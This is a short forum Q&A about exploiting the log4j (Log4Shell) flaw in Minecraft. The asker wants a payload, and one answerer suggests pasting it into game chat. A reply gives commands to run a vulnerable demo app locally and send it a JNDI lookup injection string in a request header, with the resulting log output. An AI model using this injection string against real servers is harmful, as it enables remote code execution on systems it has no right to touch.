Messages:


Unanswered Question List.
95

How to exploit log4j in Minecraft?

Asked by : Minion , Date : Dec. 22, 2021, 7:53 a.m.

How to exploit log4j in Minecraft? .....




Answers :


its not vulnerable anymore


Answered by : gunfire , Date : Dec. 22, 2021, 8:44 a.m.





if you still wants to try then you can paste payload in chat box


Answered by : gunfire , Date : Dec. 22, 2021, 8:45 a.m.

Rep. by : Minion

If it's possible send me payload

Rep. by : gunfire

If you want to reproduce this vulnerability locally, you can refer to christophetd's vulnerable app. In a terminal run:

docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

and in another:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'

the logs should include an error message indicating that a remote lookup was attempted but failed:

2021-12-10 17:14:56,207 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]